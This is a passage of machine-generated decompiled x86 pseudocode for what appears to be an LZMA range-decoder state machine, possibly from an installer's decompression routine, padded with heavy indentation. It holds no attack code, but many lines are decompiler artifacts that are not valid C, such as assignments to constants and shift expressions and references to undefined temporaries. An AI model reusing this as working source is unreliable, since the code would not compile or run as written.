                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L39;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L37;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0xe:
                                                                                                                                                                            											L46:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t156 = __ebp - 0x70;
                                                                                                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t156;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L48:
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													break;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                                                                                                            													__ebx = _t170;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													continue;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L46;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											L54:
                                                                                                                                                                            											_t173 = __ebp - 0x34;
                                                                                                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            											__eflags =  *_t173;
                                                                                                                                                                            											goto L55;
                                                                                                                                                                            										case 0xf:
                                                                                                                                                                            											L58:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t203 = __ebp - 0x70;
                                                                                                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t203;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L60:
                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                            												L55:
                                                                                                                                                                            												__al =  *(__ebp - 0x44);
                                                                                                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            												goto L56;
                                                                                                                                                                            											}
                                                                                                                                                                            											L61:
                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                            											__edx = __ebx + __ebx;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                                                                                                            												__ebx = _t217;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L60;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L58;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x10:
                                                                                                                                                                            											L109:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t365 = __ebp - 0x70;
                                                                                                                                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t365;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											goto L111;
                                                                                                                                                                            										case 0x11:
                                                                                                                                                                            											L69:
                                                                                                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            												goto L133;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x12:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            											__eflags = __eax;
                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            											goto L130;
                                                                                                                                                                            										case 0x13:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												_t469 = __ebp - 0x58;
                                                                                                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            												__eflags =  *_t469;
                                                                                                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                                                                                                            												L144:
                                                                                                                                                                            												 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                            												goto L145;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            											L130:
                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            											 *(__ebp - 0x40) = 3;
                                                                                                                                                                            											goto L144;
                                                                                                                                                                            										case 0x14:
                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                                                                                                            											 *(_t613 - 0x88) = _t533;
                                                                                                                                                                            											goto L1;
                                                                                                                                                                            										case 0x15:
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            											__al = __al & 0x000000fd;
                                                                                                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            											goto L120;
                                                                                                                                                                            										case 0x16:
                                                                                                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                                                                                                            											__eflags = __eax - 4;
                                                                                                                                                                            											if(__eax >= 4) {
                                                                                                                                                                            												_push(3);
                                                                                                                                                                            												_pop(__eax);
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                            											 *(__ebp - 0x40) = 6;
                                                                                                                                                                            											__eax = __eax << 7;
                                                                                                                                                                            											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            											goto L145;
                                                                                                                                                                            										case 0x17:
                                                                                                                                                                            											L145:
                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                            											 *(__ebp - 0x50) = 1;
                                                                                                                                                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                            											goto L149;
                                                                                                                                                                            										case 0x18:
                                                                                                                                                                            											L146:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t484 = __ebp - 0x70;
                                                                                                                                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t484;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L148:
                                                                                                                                                                            											_t487 = __ebp - 0x48;
                                                                                                                                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            											__eflags =  *_t487;
                                                                                                                                                                            											L149:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            											if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            												__ecx =  *(__ebp - 0x40);
                                                                                                                                                                            												__ebx =  *(__ebp - 0x50);
                                                                                                                                                                            												0 = 1;
                                                                                                                                                                            												__eax = 1 << __cl;
                                                                                                                                                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                            												__eax =  *(__ebp - 0x7c);
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													 *(_t613 - 0x88) = _t533;
                                                                                                                                                                            													goto L1;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x50);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eax = __eax - __ecx;
                                                                                                                                                                            												__edx = __edx + 1;
                                                                                                                                                                            												__eflags = __edx;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            												 *(__ebp - 0x50) = __edx;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L148;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L146;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x19:
                                                                                                                                                                            											__eflags = __ebx - 4;
                                                                                                                                                                            											if(__ebx < 4) {
                                                                                                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                            												L119:
                                                                                                                                                                            												_t393 = __ebp - 0x2c;
                                                                                                                                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                            												__eflags =  *_t393;
                                                                                                                                                                            												L120:
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												if(__eax == 0) {
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                            												_t400 = __ebp - 0x60;
                                                                                                                                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                            												__eflags =  *_t400;
                                                                                                                                                                            												goto L123;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx = __ebx;
                                                                                                                                                                            											__eax = __ebx;
                                                                                                                                                                            											__ecx = __ebx >> 1;
                                                                                                                                                                            											__eax = __ebx & 0x00000001;
                                                                                                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            											__al = __al | 0x00000002;
                                                                                                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            											__eflags = __ebx - 0xe;
                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            											if(__ebx >= 0xe) {
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                            												L102:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            													__eax = __eax + __ebx;
                                                                                                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													L108:
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                                                                                                            													L112:
                                                                                                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                            														_t391 = __ebp - 0x2c;
                                                                                                                                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                            														__eflags =  *_t391;
                                                                                                                                                                            														goto L119;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													__esi = __edi + __eax;
                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                            														__ecx = 0;
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                            														__ecx = 1;
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            														__ebx = 1;
                                                                                                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                            														__ebx = 1 << __cl;
                                                                                                                                                                            														__ecx = 1 << __cl;
                                                                                                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                            														__eax = __eax - __ecx;
                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                            														__eflags = __edi;
                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                            														0x800 = 0x800 - __ecx;
                                                                                                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            														 *__esi = __dx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														L111:
                                                                                                                                                                            														_t368 = __ebp - 0x48;
                                                                                                                                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                            														__eflags =  *_t368;
                                                                                                                                                                            														goto L112;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L109;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                                                                                                            													__eflags = __ebx;
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													L101:
                                                                                                                                                                            													_t338 = __ebp - 0x48;
                                                                                                                                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            													__eflags =  *_t338;
                                                                                                                                                                            													goto L102;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L99;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											__edx =  *(__ebp - 4);
                                                                                                                                                                            											__eax = __eax - __ebx;
                                                                                                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                            											goto L108;
                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                            											L56:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                            											__eax = __ecx + 1;
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            											__edx = _t192;
                                                                                                                                                                            											goto L79;
                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                            											L75:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            											}
                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                            											__cl =  *(__eax + __edx);
                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            											 *(__eax + __edx) = __cl;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            											__edx = _t274;
                                                                                                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            											_t283 = __ebp - 0x64;
                                                                                                                                                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            											__eflags =  *_t283;
                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            											L79:
                                                                                                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                            											goto L80;
                                                                                                                                                                            										case 0x1c:
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L123:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            													break;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            												__edx = _t414;
                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            												 *(__ebp - 0x14) = _t414;
                                                                                                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                            													continue;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													L80:
